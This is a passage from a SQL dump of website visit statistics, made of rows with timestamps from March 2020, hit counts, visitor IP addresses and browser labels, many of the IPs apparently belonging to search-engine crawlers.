028,1583996985,4,4,0,0,'66.249.64.23','chrome'),(488029,1583997057,1,1,0,0,'66.249.70.38','chrome'),(488030,1583997173,5,5,0,0,'66.249.64.25','chrome'),(488031,1583997614,1,1,0,0,'37.53.90.175','chrome'),(488032,1583998084,1,1,0,0,'66.249.64.24','chrome'),(488033,1583998174,1,1,0,0,'66.249.70.36','chrome'),(488034,1583998206,1,1,0,0,'66.249.64.23','chrome'),(488035,1583998938,5,5,0,0,'66.249.64.25','chrome'),(488036,1583999268,5,5,0,0,'66.249.64.24','chrome'),(488037,1583999317,1,1,0,0,'178.154.171.134','other'),(488038,1583999339,8,8,0,0,'66.249.64.23','chrome'),(488039,1583999348,2,2,0,0,'66.249.70.36','chrome'),(488040,1583999978,2,2,0,0,'213.108.45.138','chrome'),(488041,1584000851,1,1,0,0,'66.249.64.24','chrome'),(488042,1584000867,1,1,0,0,'66.249.64.23','chrome'),(488043,1584001411,2,2,0,0,'66.249.64.25','chrome'),(488044,1584001737,1,1,0,0,'91.196.178.94','chrome'),(488045,1584002816,1,1,0,0,'66.249.64.24','chrome'),(488046,1584002963,1,1,0,0,'66.249.64.25','chrome'),(488047,1584003006,2,2,0,0,'66.249.64.23','chrome'),(488048,1584003028,1,1,0,0,'91.196.178.94','chrome'),(488049,1584003158,1,1,0,0,'66.249.70.33','chrome'),(488050,1584004189,3,3,0,0,'66.249.70.38','chrome'),(488051,1584004205,5,5,0,0,'66.249.64.23','chrome'),(488052,1584004551,2,2,0,0,'8.29.198.26','other'),(488053,1584004733,1,1,0,0,'94.153.76.10','chrome'),(488054,1584004996,1,1,0,0,'185.218.202.67','chrome'),(488055,1584005715,1,1,0,0,'66.249.64.25','chrome'),(488056,1584006649,1,1,0,0,'176.107.123.11','firefox'),(488057,1584007167,1,1,0,0,'52.14.167.151','chrome'),(488058,1584007195,1,1,0,0,'66.249.64.23','chrome'),(488059,1584007466,1,1,0,0,'91.196.178.140','firefox'),(488060,1584007592,2,2,0,0,'66.249.70.36','chrome'),(488061,1584008712,1,0,1,0,'66.249.64.25',''),(488062,1584009282,1,1,0,0,'66.249.64.24','chrome'),(488063,1584009737,3,3,0,0,'66.249.64.25','chrome'),(488064,1584009924,1,1,0,0,'91.124.175.152','chrome'),(488065,1584010130,4,4,0,0,'66.249.64.23','chrome'),(488066,1584010250,2,2,0,0,'66.249.64.24','chrome'),(488067,1584010253,1,1,0,0,'66.249.70.38','chrome'),(488068,1584010427,1,1,0,0,'178.154.171.134','other'),(488069,1584010822,1,1,0,0,'91.124.118.77','chrome'),(488070,1584011304,1,1,0,0,'66.249.64.25','chrome'),(488071,1584011573,1,1,0,0,'134.249.146.125','chrome'),(488072,1584012755,1,1,0,0,'66.249.64.25','chrome'),(488073,1584013223,1,1,0,0,'66.249.64.24','chrome'),(488074,1584013804,1,1,0,0,'109.74.154.72','chrome'),(488075,1584013965,1,1,0,0,'66.249.70.38','chrome'),(488076,1584014090,2,2,0,0,'66.249.64.23','chrome'),(488077,1584014360,1,1,0,0,'66.249.64.25','chrome'),(488078,1584015411,1,1,0,0,'8.29.198.27','other'),(488079,1584016271,1,1,0,0,'8.29.198.25','other'),(488080,1584016374,1,1,0,0,'93.119.227.34','other'),(488081,1584016375,1,1,0,0,'93.119.227.34','chrome'),(488082,1584016513,2,2,0,0,'66.249.64.25','chrome'),(488083,1584016734,3,3,0,0,'66.249.64.24','chrome'),(488084,1584017176,2,2,0,0,'66.249.64.23','chrome'),(488085,1584017371,1,1,0,0,'66.249.70.36','chrome'),(488086,1584017431,1,1,0,0,'66.249.64.25','chrome'),(488087,1584017904,1,1,0,0,'91.196.178.85','chrome'),(488088,1584017919,1,1,0,0,'91.196.178.133','firefox'),(488089,1584018358,1,1,0,0,'176.37.49.24','chrome'),(488090,1584019449,1,1,0,0,'37.53.197.194','chrome'),(488091,1584020182,1,0,1,0,'66.249.64.23',''),(488092,1584021393,1,1,0,0,'91.196.178.81','firefox'),(488093,1584021882,1,1,0,0,'162.210.196.97','other'),(488094,1584022661,1,1,0,0,'213.180.203.142','other'),(488095,1584022753,1,1,0,0,'213.180.203.73','other'),(488096,1584023056,1,1,0,0,'91.196.178.132','firefox'),(488097,1584024059,1,1,0,0,'91.196.178.94','chrome'),(488098,1584025808,1,1,0,0,'91.196.178.182','chrome'),(488099,1584026257,1,1,0,0,'8.29.198.25','other'),(488100,1584026657,1,1,0,0,'37.55.226.145','chrome'),(488101,1584026772,1,1,0,0,'213.180.203.100','other'),(488102,1584027161,1,1,0,0,'8.29.198.27','other'),(488103,1584028011,1,1,0,0,'66.249.64.25','chrome'),(488104,1584028022,2,2,0,0,'213.180.203.186','other'),(488105,1584028372,1,1,0,0,'207.46.13.140','other'),(488106,1584030032,2,2,0,0,'207.46.13.140','other'),(488107,1584030801,2,2,0,0,'66.249.64.24','chrome'),(488108,1584031186,1,1,0,0,'213.180.203.13','other'),(488109,1584032730,1,1,0,0,'213.180.203.186','other'),(488110,1584033411,1,0,1,0,'66.249.70.33',''),(488111,1584034322,1,0,1,0,'207.46.13.140',''),(488112,1584034740,1,1,0,0,'31.13.127.13','other'),(488113,1584036103,1,1,0,0,'66.249.64.25','chrome'),(488114,1584036170,1,1,0,0,'213.180.203.218','other'),(488115,1584036477,1,1,0,0,'213.180.203.186','other'),(488116,1584037144,2,2,0,0,'8.29.198.27','other'),(488117,1584037322,1,1,0,0,'207.46.13.140','other'),(488118,1584037440,1,1,0,0,'213.180.203.218','other'),(488119,1584037899,1,1,0,0,'66.249.64.23','chrome'),(488120,1584038068,1,1,0,0,'131.220.6.152','chrome'),(488121,1584038228,1,1,0,0,'66.249.64.25','chrome'),(488122,1584038267,2,2,0,0,'213.180.203.186','other'),(488123,1584040095,1,0,1,0,'66.249.64.24',''),(488124,1584040761,2,2,0,0,'207.46.13.47','other'),(488125,1584041085,1,1,0,0,'66.249.70.33','chrome'),(488126,1584041171,2,2,0,0,'213.180.203.186','other'),(488127,1584041247,1,1,0,0,'66.249.64.23','chrome'),(488128,1584041392,1,1,0,0,'66.249.64.25','chrome'),(488129,1584041634,3,3,0,0,'66.249.64.24','chrome'),(488130,1584042913,1,1,0,0,'66.249.70.36','chrome'),(488131,1584043169,1,1,0,0,'173.252.111.23','other'),(488132,1584044853,1,1,0,0,'213.180.203.186','other'),(488133,1584045220,1,1,0,0,'207.46.13.140','other'),(488134,1584045573,1,1,0,0,'91.196.178.133','firefox'),(488135,1584045856,1,1,0,0,'66.249.64.23','chrome'),(488136,1584046082,2,2,0,0,'213.180.203.218','other'),(488137,1584046186,1,1,0,0,'207.46.13.47','other'),(488138,1584046249,3,3,0,0,'66.249.64.24','chrome'),(488139,1584046395,2,2,0,0,'213.180.203.186','other'),(488140,1584047000,1,1,0,0,'213.180.203.218','other'),(488141,1584047263,1,1,0,0,'66.249.64.25','chrome'),(488142,1584047478,1,1,0,0,'17.58.101.25','other'),(488143,1584047764,1,1,0,0,'207.46.13.140','other'),(488144,1584048009,1,1,0,0,'8.29.198.25','other'),(488145,1584048058,1,1,0,0,'151.80.39.80','other'),(488146,1584048189,1,1,0,0,'213.180.203.186','other'),(488147,1584048915,1,1,0,0,'66.249.64.24','chrome'),(488148,1584048943,1,1,0,0,'8.29.198.26','other'),(488149,1584049105,1,1,0,0,'66.249.64.25','chrome'),(488150,1584049133,1,1,0,0,'66.249.70.36','chrome'),(488151,1584049154,1,1,0,0,'207.46.13.47','other'),(488152,1584050433,1,1,0,0,'66.249.64.24','chrome'),(488153,1584050680,1,1,0,0,'66.249.70.36','chrome'),(488154,1584051454,2,2,0,0,'207.46.13.47','other'),(488155,1584051813,1,1,0,0,'213.180.203.186','other'),(488156,1584053188,1,1,0,0,'66.249.64.23','chrome'),(488157,1584053200,1,1,0,0,'93.124.15.87','chrome'),(488158,1584053321,3,3,0,0,'66.249.64.25','chrome'),(488159,1584054245,1,1,0,0,'213.180.203.186','other'),(488160,1584054865,1,1,0,0,'207.46.13.140','other'),(488161,1584054866,1,1,0,0,'51.68.152.26','chrome'),(488162,1584055551,1,1,0,0,'66.249.64.25','chrome'),(488163,1584057053,2,2,0,0,'207.46.13.140','other'),(488164,1584057507,1,1,0,0,'207.46.13.47','other'),(488165,1584057939,1,1,0,0,'66.249.64.23','chrome'),(488166,1584058016,1,1,0,0,'213.180.203.218','other'),(488167,1584058074,1,1,0,0,'207.46.13.140','other'),(488168,1584058293,1,1,0,0,'66.249.64.24','chrome'),(488169,1584058531,1,1,0,0,'213.180.203.186','other'),(488170,1584058917,1,1,0,0,'207.46.13.47','other'),(488171,1584059017,1,1,0,0,'213.180.203.218','other'),(488172,1584059037,2,2,0,0,'8.29.198.25','other'),(488173,1584059089,1,1,0,0,'66.249.70.36','chrome'),(488174,1584059582,1,1,0,0,'66.249.64.24','chrome'),(488175,1584060029,1,1,0,0,'213.180.203.218','other'),(488176,1584060305,1,1,0,0,'213.180.203.186','other'),(488177,1584060645,1,1,0,0,'66.249.64.24','chrome'),(488178,1584060913,1,1,0,0,'62.205.134.182','other'),(488179,1584061096,2,1,1,0,'66.249.64.23',''),(488180,1584062171,1,1,0,0,'207.46.13.140','other'),(488181,1584062967,2,2,0,0,'66.249.64.23','chrome'),(488182,1584063126,1,1,0,0,'207.46.13.47','other'),(488183,1584063173,1,1,0,0,'207.46.13.140','other'),(488184,1584064429,1,1,0,0,'66.249.70.38','chrome'),(488185,1584064664,1,1,0,0,'66.249.64.25','chrome'),(488186,1584065341,2,1,1,0,'207.46.13.140',''),(488187,1584066072,2,2,0,0,'66.249.70.33','chrome'),(488188,1584066256,1,1,0,0,'213.180.203.186','other'),(488189,1584066427,1,1,0,0,'66.249.64.23','chrome'),(488190,1584066460,1,1,0,0,'207.46.13.140','other'),(488191,1584067156,1,1,0,0,'66.249.70.36','chrome'),(488192,1584067159,1,0,1,0,'66.249.64.24',''),(488193,1584067573,1,1,0,0,'66.249.64.23','chrome'),(488194,1584067750,1,1,0,0,'213.180.203.186','other'),(488195,1584068106,1,1,0,0,'66.249.64.24','chrome'),(488196,1584068589,2,2,0,0,'66.249.64.25','chrome'),(488197,1584068847,1,1,0,0,'213.180.203.186','other'),(488198,1584069495,1,1,0,0,'207.46.13.140','other'),(488199,1584069953,1,1,0,0,'8.29.198.25','other'),(488200,1584070116,1,1,0,0,'207.46.13.47','other'),(488201,1584070283,2,2,0,0,'66.249.70.38','chrome'),(488202,1584070487,1,1,0,0,'66.249.64.25','chrome'),(488203,1584070681,1,1,0,0,'8.29.198.27','other'),(488204,1584071246,1,1,0,0,'51.75.175.28','other'),(488205,1584071453,2,2,0,0,'213.180.203.186','other'),(488206,1584071520,1,1,0,0,'66.249.70.33','chrome'),(488207,1584072288,1,1,0,0,'213.180.203.218','other'),(488208,1584072579,2,2,0,0,'66.249.64.25','chrome'),(488209,1584072904,1,1,0,0,'66.249.64.24','chrome'),(488210,1584073119,1,1,0,0,'66.249.64.23','chrome'),(488211,1584075805,1,1,0,0,'40.77.189.250','other'),(488212,1584076203,1,1,0,0,'66.249.64.24','chrome'),(488213,1584076261,1,1,0,0,'62.149.15.172','chrome'),(488214,1584076525,1,1,0,0,'207.46.13.47','other'),(488215,1584076540,1,1,0,0,'66.249.64.23','chrome'),(488216,1584077789,1,1,0,0,'66.249.64.24','chrome'),(488217,1584077812,1,1,0,0,'66.249.64.23','chrome'),(488218,1584077932,2,2,0,0,'213.180.203.186','other'),(488219,1584078048,1,1,0,0,'62.205.134.182','other'),(488220,1584078169,1,1,0,0,'66.249.70.36','chrome'),(488221,1584078923,2,2,0,0,'66.249.64.23','chrome'),(488222,1584079318,2,2,0,0,'66.249.64.24','chrome'),(488223,1584079582,1,1,0,0,'66.249.70.33','chrome'),(488224,1584080174,2,2,0,0,'207.46.13.140','other'),(488225,1584080209,1,1,0,0,'176.121.228.108','firefox'),(488226,1584080818,1,1,0,0,'8.29.198.25','other'),(488227,1584081543,1,1,0,0,'8.29.198.26','other'),(488228,1584081580,1,1,0,0,'66.249.64.25','chrome'),(488229,1584081596,1,1,0,0,'91.196.177.46','chrome'),(488230,1584081861,1,1,0,0,'66.249.70.33','chrome'),(488231,1584082171,1,1,0,0,'207.46.13.140','other'),(488232,1584082930,2,2,0,0,'66.249.64.23','chrome'),(488233,1584082946,1,1,0,0,'91.196.178.190','chrome'),(488234,1584083133,1,1,0,0,'66.249.64.25','chrome'),(488235,1584084285,1,1,0,0,'66.249.64.23','chrome'),(488236,1584084367,1,1,0,0,'66.249.64.25','chrome'),(488237,1584085225,1,1,0,0,'66.249.64.23','chrome'),(488238,1584085250,2,2,0,0,'207.46.13.140','other'),(488239,1584085332,2,2,0,0,'213.180.203.186','other'),(488240,1584086179,1,1,0,0,'207.46.13.47','other'),(488241,1584086253,1,1,0,0,'66.249.64.25','chrome'),(488242,1584086373,1,1,0,0,'138.246.253.15','chrome'),(488243,1584086599,1,1,0,0,'66.249.70.33','chrome'),(488244,1584086690,1,1,0,0,'213.180.203.186','other'),(488245,1584087112,1,1,0,0,'66.249.64.24','chrome'),(488246,1584087204,1,1,0,0,'207.46.13.140','other'),(488247,1584087335,1,1,0,0,'91.196.178.169','chrome'),(488248,1584088625,1,1,0,0,'46.211.128.207','chrome'),(488249,1584089107,2,2,0,0,'31.13.127.15','other'),(488250,1584089109,1,1,0,0,'31.13.127.17','other'),(488252,1584089110,1,1,0,0,'31.13.127.5','other'),(488253,1584089176,1,1,0,0,'91.196.177.46','chrome'),(488254,1584090199,1,1,0,0,'66.249.64.23','chrome'),(488255,1584090233,1,1,0,0,'66.249.64.24','chrome'),(488256,1584091646,2,2,0,0,'66.249.70.36','chrome'),(488257,1584091714,1,1,0,0,'8.29.198.27','other'),(488258,1584091786,1,1,0,0,'66.249.64.23','chrome'),(488259,1584092404,1,1,0,0,'8.29.198.25','other'),(488260,1584092870,1,1,0,0,'66.249.64.25','chrome'),(488261,1584093914,1,1,0,0,'66.249.64.24','chrome'),(488262,1584093987,1,1,0,0,'3.94.153.191','chrome'),(488263,1584094153,1,1,0,0,'213.180.203.218','other'),(488264,1584095395,1,1,0,0,'213.180.203.186','other'),(488265,1584095410,1,1,0,0,'66.249.70.38','chrome'),(488266,1584095469,1,1,0,0,'176.111.33.18','firefox'),(488267,1584095570,2,2,0,0,'66.249.64.23','chrome'),(488268,1584096694,2,2,0,0,'66.249.64.24','chrome'),(488269,1584096733,1,0,1,0,'66.249.64.25',''),(488270,1584097481,3,3,0,0,'66.249.64.23','chrome'),(488271,1584097734,4,4,0,0,'66.249.64.24','chrome'),(488272,1584097791,1,1,0,0,'207.46.13.47','other'),(488273,1584098105,2,2,0,0,'66.249.70.38','chrome'),(488274,1584098124,1,1,0,0,'207.46.13.140','other'),(488275,1584098213,1,1,0,0,'66.249.70.36','chrome'),(488276,1584098419,2,2,0,0,'66.249.64.23','chrome'),(488277,1584099040,2,2,0,0,'207.46.13.47','other'),(488278,1584099292,1,1,0,0,'209.17.97.18','other'),(488279,1584100241,1,1,0,0,'213.180.203.218','other'),(488280,1584100887,1,1,0,0,'207.46.13.140','other'),(488281,1584100979,1,1,0,0,'91.196.178.190','chrome'),(488282,1584101667,1,1,0,0,'109.74.154.72','chrome'),(488283,1584102608,1,1,0,0,'8.29.198.27','other'),(488284,1584103259,1,1,0,0,'8.29.198.25','other'),(488285,1584103292,1,0,1,0,'207.46.13.47',''),(488286,1584104047,1,1,0,0,'213.180.203.186','other'),(488287,1584104216,1,1,0,0,'207.46.13.140','other'),(488288,1584104451,1,1,0,0,'213.180.203.218','other'),(488289,1584104560,2,1,1,0,'207.46.13.47',''),(488290,1584105427,1,1,0,0,'207.46.13.140','other'),(488291,1584105530,1,1,0,0,'66.42.76.138','msie'),(488292,1584105711,1,1,0,0,'176.241.106.185','chrome'),(488293,1584106623,1,1,0,0,'176.241.106.185','chrome'),(488294,1584107443,1,1,0,0,'91.196.178.190','chrome'),(488295,1584108734,1,1,0,0,'188.93.56.216','firefox'),(488296,1584108787,1,1,0,0,'94.153.86.71','chrome'),(488297,1584109987,1,1,0,0,'213.160.133.254','chrome'),(488298,1584110497,1,1,0,0,'37.52.114.74','chrome'),(488299,1584110963,1,1,0,0,'213.160.133.254','chrome'),(488300,1584111299,1,1,0,0,'91.196.178.147','firefox'),(488301,1584111615,1,0,1,0,'207.46.13.47',''),(488302,1584111818,1,1,0,0,'91.196.178.145','chrome'),(488303,1584112109,1,1,0,0,'91.196.178.188','chrome'),(488304,1584113541,2,2,0,0,'8.29.198.26','other'),(488305,1584114075,2,2,0,0,'207.46.13.140','other'),(488306,1584114521,1,1,0,0,'91.196.178.188','chrome'),(488307,1584116036,1,1,0,0,'91.196.178.188','chrome'),(488308,1584116131,3,3,0,0,'66.249.70.33','chrome'),(488309,1584116132,5,4,1,0,'66.249.64.24',''),(488310,1584116136,1,1,0,0,'37.73.221.108','chrome'),(488311,1584116191,3,1,2,0,'66.249.64.23',''),(488312,1584116280,5,5,0,0,'66.249.64.25','chrome'),(488313,1584116303,3,1,2,0,'66.249.64.23',''),(488314,1584116329,9,9,0,0,'66.249.64.23','chrome'),(488315,1584116459,1,1,0,0,'207.46.13.47','other'),(488316,1584116703,2,2,0,0,'66.249.70.36','chrome'),(488317,1584116720,2,2,0,0,'66.249.64.24','chrome'),(488318,1584116953,1,1,0,0,'91.196.178.94','chrome'),(488319,1584117286,1,1,0,0,'66.249.70.33','chrome'),(488320,1584117907,1,1,0,0,'87.148.38.167','firefox'),(488321,1584117973,1,1,0,0,'207.46.13.47','other'),(488322,1584118238,3,3,0,0,'66.249.64.24','chrome'),(488323,1584118251,3,3,0,0,'66.249.64.23','chrome'),(488324,1584118461,1,1,0,0,'178.154.171.127','other'),(488325,1584118719,2,2,0,0,'66.249.70.38','chrome'),(488326,1584118856,2,2,0,0,'207.46.13.140','other'),(488327,1584119587,2,2,0,0,'66.249.64.24','chrome'),(488328,1584119765,3,3,0,0,'66.249.64.25','chrome'),(488329,1584120077,1,1,0,0,'37.73.105.243','chrome'),(488330,1584120148,1,1,0,0,'193.110.107.130','chrome'),(488331,1584120175,1,1,0,0,'66.249.64.23','chrome'),(488332,1584120297,1,1,0,0,'207.46.13.47','other'),(488333,1584121063,1,1,0,0,'93.159.230.28','chrome'),(488334,1584121273,3,3,0,0,'66.249.64.24','chrome'),(488335,1584121345,1,1,0,0,'66.249.64.25','chrome'),(488336,1584122331,1,1,0,0,'178.154.171.134','other'),(488337,1584122388,1,1,0,0,'66.249.64.25','chrome'),(488338,1584122569,1,1,0,0,'66.249.70.36','chrome'),(488339,1584124127,1,1,0,0,'141.8.132.19','other'),(488340,1584124455,2,2,0,0,'8.29.198.25','other'),(488341,1584124480,1,1,0,0,'66.249.70.36','chrome'),(488342,1584124839,3,3,0,0,'66.249.64.23','chrome'),(488343,1584125019,2,2,0,0,'66.249.64.25','chrome'),(488344,1584125334,2,2,0,0,'66.249.70.33','chrome'),(488345,1584125724,2,2,0,0,'66.249.64.24','chrome'),(488346,1584125996,2,2,0,0,'66.249.64.23','chrome'),(488347,1584126329,1,1,0,0,'94.153.85.19','chrome'),(488348,1584126370,4,4,0,0,'31.13.127.11','other'),(488349,1584126374,1,1,0,0,'31.13.127.16','other'),(488350,1584126417,1,1,0,0,'31.13.127.1','other'),(488351,1584126418,4,4,0,0,'31.13.127.23','other'),(488352,1584126419,1,1,0,0,'31.13.127.10','other'),(488353,1584126435,1,1,0,0,'31.13.103.1','other'),(488354,1584126462,2,2,0,0,'31.13.127.2','other'),(488355,1584126463,2,2,0,0,'31.13.127.13','other'),(488358,1584126464,1,1,0,0,'31.13.127.5','other'),(488361,1584126475,1,1,0,0,'178.133.115.12','chrome'),(488362,1584126778,1,1,0,0,'94.153.20.123','chrome'),(488363,1584126787,1,1,0,0,'91.196.178.187','chrome'),(488364,1584127286,1,1,0,0,'46.211.43.177','chrome'),(488365,1584127492,1,1,0,0,'31.13.127.13','other'),(488366,1584127643,1,1,0,0,'66.249.70.36','chrome'),(488367,1584127656,3,3,0,0,'66.249.64.23','chrome'),(488368,1584127883,1,1,0,0,'66.249.70.38','chrome'),(488369,1584127926,1,1,0,0,'94.153.85.19','chrome'),(488370,1584128138,1,1,0,0,'178.154.171.134','other'),(488371,1584128150,1,1,0,0,'66.249.70.33','chrome'),(488372,1584128235,1,1,0,0,'66.249.64.24','chrome'),(488373,1584128375,1,1,0,0,'88.155.95.156','chrome'),(488374,1584128608,1,1,0,0,'91.196.178.138','firefox'),(488375,1584129572,1,1,0,0,'91.196.178.74','firefox'),(488376,1584129697,1,1,0,0,'91.124.181.19','chrome'),(488377,1584129842,1,1,0,0,'207.46.13.47','other'),(488378,1584129843,1,1,0,0,'66.249.64.24','chrome'),(488379,1584129862,1,1,0,0,'173.252.95.28','other'),(488380,1584129993,2,2,0,0,'66.249.64.23','chrome'),(488381,1584130072,1,1,0,0,'37.73.127.68','chrome'),(488382,1584131048,1,1,0,0,'207.46.13.140','other'),(488383,1584131173,1,1,0,0,'91.196.178.48','chrome'),(488384,1584131547,1,1,0,0,'66.249.64.25','chrome'),(488385,1584131583,1,1,0,0,'66.249.64.24','chrome'),(488386,1584131957,2,2,0,0,'66.249.70.38','chrome'),(488387,1584132547,99,99,0,0,'139.178.68.170','other'),(488388,1584132567,1,1,0,0,'91.196.178.48','chrome'),(488389,1584132701,2,2,0,0,'66.249.64.23','chrome'),(488390,1584132842,2,2,0,0,'66.249.64.25','chrome'),(488391,1584133036,1,1,0,0,'178.154.171.134','other'),(488392,1584133070,1,1,0,0,'66.249.64.24','chrome'),(488393,1584133208,1,1,0,0,'207.46.13.47','other'),(488394,1584134576,1,1,0,0,'66.249.64.23','chrome'),(488395,1584135498,1,1,0,0,'8.29.198.25','other'),(488396,1584135550,1,1,0,0,'178.154.171.127','other'),(488397,1584136470,1,1,0,0,'8.29.198.26','other'),(488398,1584136941,1,1,0,0,'178.154.171.134','other'),(488399,1584139567,3,2,1,0,'66.249.64.23',''),(488400,1584139806,2,1,1,0,'66.249.64.24',''),(488401,1584140239,1,1,0,0,'66.249.70.33','chrome'),(488402,1584140660,1,1,0,0,'199.244.88.131','chrome'),(488403,1584140665,7,7,0,0,'66.249.64.23','chrome'),(488404,1584140862,2,2,0,0,'66.249.64.25','chrome'),(488405,1584141078,5,5,0,0,'66.249.64.24','chrome'),(488406,1584141137,1,1,0,0,'141.8.183.111','other'),(488407,1584141974,1,1,0,0,'178.154.171.134','other'),(488408,1584142368,1,1,0,0,'207.46.13.140','other'),(488409,1584142951,3,3,0,0,'66.249.64.25','chrome'),(488410,1584143005,1,1,0,0,'66.249.64.23','chrome'),(488411,1584143105,2,2,0,0,'66.249.70.36','chrome'),(488412,1584143370,2,2,0,0,'69.4.89.106','chrome'),(488413,1584144215,1,1,0,0,'66.249.70.38','chrome'),(488414,1584144430,1,1,0,0,'207.46.13.140','other'),(488415,1584144534,1,1,0,0,'207.46.13.47','other'),(488416,1584144808,2,2,0,0,'66.249.64.23','chrome'),(488417,1584144897,3,3,0,0,'66.249.64.25','chrome'),(488418,1584144964,3,2,1,0,'66.249.64.24',''),(488419,1584146202,1,1,0,0,'207.46.13.140','other'),(488420,1584146436,1,1,0,0,'8.29.198.26','other'),(488421,1584147201,2,2,0,0,'66.249.64.23','chrome'),(488422,1584147314,1,1,0,0,'62.205.134.182','other'),(488423,1584147443,1,1,0,0,'8.29.198.25','other'),(488424,1584148473,1,1,0,0,'178.154.171.134','other'),(488425,1584153091,1,1,0,0,'207.46.13.140','other'),(488426,1584153993,1,1,0,0,'66.249.64.25','chrome'),(488427,1584154516,1,1,0,0,'207.46.13.140','other'),(488428,1584156539,1,1,0,0,'66.249.64.24','chrome'),(488429,1584157338,1,1,0,0,'178.154.171.127','other'),(488430,1584157354,1,1,0,0,'8.29.198.27','other'),(488431,1584158288,1,1,0,0,'207.46.13.140','other'),(488432,1584158298,1,1,0,0,'8.29.198.26','other'),(488433,1584159812,1,1,0,0,'66.249.64.25','chrome'),(488434,1584161479,1,1,0,0,'178.154.171.134','other'),(488435,1584161652,1,1,0,0,'207.46.13.47','other'),(488436,1584162826,1,1,0,0,'66.249.70.33','chrome'),(488437,1584163622,2,2,0,0,'157.55.39.78','other'),(488438,1584163720,1,1,0,0,'78.111.186.139','other'),(488439,1584164466,1,1,0,0,'62.205.134.182','other'),(488440,1584164786,1,1,0,0,'66.249.64.23','chrome'),(488441,1584165667,3,3,0,0,'66.249.64.24','chrome'),(488442,1584165672,1,1,0,0,'66.249.70.36','chrome'),(488443,1584165747,1,1,0,0,'157.55.39.78','other'),(488444,1584165756,1,1,0,0,'66.249.70.33','chrome'),(488445,1584165863,7,7,0,0,'66.249.64.23','chrome'),(488446,1584165974,4,4,0,0,'66.249.64.25','chrome'),(488447,1584166676,1,1,0,0,'66.249.70.36','chrome'),(488448,1584166814,1,1,0,0,'66.249.70.38','chrome'),(488449,1584167384,2,2,0,0,'66.249.64.23','chrome'),(488450,1584167445,2,1,1,0,'66.249.64.24',''),(488451,1584167702,1,1,0,0,'178.154.171.134','other'),(488452,1584167779,1,1,0,0,'91.196.178.60','chrome'),(488453,1584168265,2,2,0,0,'8.29.198.26','other'),(488454,1584168461,1,1,0,0,'17.58.101.25','other'),(488456,1584168652,1,1,0,0,'66.249.64.23','chrome'),(488457,1584168835,3,3,0,0,'66.249.64.25','chrome'),(488458,1584169115,1,1,0,0,'46.211.67.140','chrome'),(488459,1584169267,2,2,0,0,'66.249.64.24','chrome'),(488460,1584169316,1,1,0,0,'66.249.70.36','chrome'),(488461,1584170734,2,2,0,0,'157.55.39.78','other'),(488462,1584171114,2,2,0,0,'24.22.25.206','other'),(488463,1584171256,1,1,0,0,'66.249.64.24','chrome'),(488464,1584171736,1,1,0,0,'66.249.64.25','chrome'),(488465,1584171875,1,1,0,0,'31.13.127.8','other'),(488466,1584173139,1,1,0,0,'66.249.70.36','chrome'),(488467,1584173725,1,1,0,0,'207.46.13.47','other'),(488468,1584173762,1,1,0,0,'46.211.65.251','chrome'),(488469,1584173780,2,2,0,0,'66.249.64.24','chrome'),(488470,1584173824,1,1,0,0,'66.249.64.25','chrome'),(488471,1584174826,1,1,0,0,'66.249.64.24','chrome'),(488472,1584174937,3,3,0,0,'66.249.64.25','chrome'),(488473,1584175469,1,1,0,0,'178.154.171.134','other'),(488474,1584175479,1,1,0,0,'66.249.70.38','chrome'),(488475,1584175816,3,3,0,0,'157.55.39.78','other'),(488476,1584176055,1,1,0,0,'207.46.13.47','other'),(488477,1584176769,1,1,0,0,'95.91.208.19','firefox'),(488478,1584176828,1,1,0,0,'178.154.171.134','other'),(488479,1584176855,1,1,0,0,'176.37.154.102','chrome'),(488480,1584176944,1,1,0,0,'66.249.64.24','chrome'),(488481,1584177802,2,2,0,0,'207.46.13.47','other'),(488482,1584178039,1,1,0,0,'62.149.15.172','chrome'),(488483,1584178177,2,2,0,0,'66.249.64.24','chrome'),(488484,1584178229,1,0,1,0,'157.55.39.78',''),(488485,1584178239,3,3,0,0,'66.249.64.23','chrome'),(488486,1584178529,2,2,0,0,'66.249.64.25','chrome'),(488487,1584179201,1,1,0,0,'8.29.198.25','other'),(488488,1584179277,1,1,0,0,'66.249.64.24','chrome'),(488489,1584180010,2,2,0,0,'66.249.64.23','chrome'),(488490,1584180022,1,1,0,0,'8.29.198.26','other'),(488491,1584180139,1,1,0,0,'66.249.64.25','chrome'),(488492,1584180242,1,1,0,0,'66.249.64.24','chrome'),(488493,1584180656,1,1,0,0,'157.55.39.78','other'),(488494,1584180772,1,1,0,0,'46.211.55.239','chrome'),(488495,1584181655,1,1,0,0,'31.13.127.5','other'),(488496,1584181673,1,1,0,0,'31.13.127.12','other'),(488497,1584181674,1,1,0,0,'31.13.127.16','other'),(488499,1584182089,1,1,0,0,'66.249.64.24','chrome'),(488500,1584182320,1,1,0,0,'207.46.13.47','other'),(488501,1584182917,2,2,0,0,'157.55.39.78','other'),(488502,1584183051,1,1,0,0,'66.249.70.36','chrome'),(488503,1584183127,1,1,0,0,'66.249.64.23','chrome'),(488504,1584183135,1,1,0,0,'66.249.64.24','chrome'),(488505,1584183211,1,1,0,0,'66.249.64.25','chrome'),(488506,1584183219,1,1,0,0,'178.92.170.90','chrome'),(488507,1584183403,1,1,0,0,'66.249.70.38','chrome'),(488508,1584183447,2,2,0,0,'66.249.70.33','chrome'),(488509,1584184086,2,2,0,0,'66.249.64.24','chrome'),(488510,1584184111,3,3,0,0,'66.249.64.23','chrome'),(488511,1584184240,1,1,0,0,'66.249.70.36','chrome'),(488512,1584184333,1,1,0,0,'207.46.13.47','other'),(488513,1584185250,1,0,1,0,'66.249.64.24',''),(488514,1584185778,1,1,0,0,'157.55.39.78','other'),(488515,1584185847,1,1,0,0,'66.249.70.33','chrome'),(488516,1584186163,1,1,0,0,'66.249.70.36','chrome'),(488517,1584186180,1,1,0,0,'91.196.178.178','chrome'),(488518,1584186310,3,3,0,0,'66.249.64.25','chrome'),(488519,1584186986,1,1,0,0,'109.74.154.72','chrome'),(488520,1584187533,1,1,0,0,'66.249.64.25','chrome'),(488521,1584187712,2,2,0,0,'66.249.70.33','chrome'),(488522,1584187817,1,1,0,0,'66.249.70.38','chrome'),(488523,1584188957,1,1,0,0,'207.46.13.47','other'),(488524,1584189001,1,1,0,0,'66.249.64.25','chrome'),(488525,1584189006,1,1,0,0,'66.249.64.24','chrome'),(488526,1584189024,3,3,0,0,'66.249.64.23','chrome'),(488527,1584189363,1,1,0,0,'173.252.127.9','other'),(488528,1584189529,2,2,0,0,'91.239.81.74','chrome'),(488529,1584189838,1,1,0,0,'66.249.70.38','chrome'),(488530,1584190007,1,1,0,0,'46.211.36.195','chrome'),(488531,1584190045,2,2,0,0,'207.46.13.131','other'),(488532,1584190102,2,2,0,0,